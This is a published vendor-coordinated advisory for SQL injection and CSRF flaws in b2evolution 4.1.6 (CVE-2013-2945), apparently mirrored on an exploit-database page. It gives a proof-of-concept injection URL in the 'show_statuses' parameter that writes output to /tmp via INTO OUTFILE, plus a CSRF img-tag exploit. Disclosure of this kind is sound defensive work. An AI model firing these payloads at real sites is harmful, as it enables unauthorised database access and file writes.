Lucene search
High-Tech Bridge1337DAY-ID-20723HistoryMay 02, 2013 - 12:00 a.m.
b2evolution 4.1.6 SQL Injection Vulnerability
2013-05-0200:00:00
High-Tech Bridge
0day.today
26
0.002 Low
EPSS
Percentile
55.6%
b2evolution version 4.1.6 suffers from remote SQL injection and cross site request forgery vulnerabilities.
Product: b2evolution
Vendor: b2evolution Group
Vulnerable Version(s): 4.1.6 and probably prior
Tested Version: 4.1.6
Vendor Notification: April 10, 2013
Vendor Patch: April 29, 2013
Public Disclosure: May 1, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-2945
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in b2evolution, which can be exploited to alter SQL requests passed to the vulnerable application's database.
1) SQL Injection in b2evolution: CVE-2013-2945
The vulnerability exists due to insufficient validation of HTTP GET parameter "show_statuses" in "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, PoC code below will create a "/tmp/file.txt" file, containing MySQL version:
http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
This vulnerability is also exploitable via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit malicious web page with CSRF exploit.
Basic CSRF exploit:
<img src="http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --">
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to b2evolution 4.1.7
More Information:
http://b2evolution.net/news/2013/04/29/b2evolution-4-1-7-and-5-0-3
-----------------------------------------------------------------------------------------------
# 0day.today [2018-03-05] #Related
prion
prion
Sql injection
2014-04-02 16:17:00
Cross site request forgery (csrf)
2014-04-02 18:55:00
securityvulns
securityvulns
SQL Injection in b2evolution
2013-05-06 00:00:00
htbridge
htbridge
SQL Injection in b2evolution
2013-04-10 00:00:00
cvelist
cvelist
CVE-2013-2945
2014-04-02 15:00:00
CVE-2013-7352
2022-10-03 16:14:53
packetstorm
packetstorm
b2evolution 4.1.6 SQL Injection
2013-05-01 00:00:00
cve
cve
CVE-2013-2945
2014-04-02 16:17:00
CVE-2013-7352
2014-04-02 18:55:00
exploitpack
exploitpack
b2evolution 4.1.6 - Multiple Vulnerabilities
2013-05-07 00:00:00
exploitdb
exploitdb
b2evolution 4.1.6 - Multiple Vulnerabilities
2013-05-07 00:00:00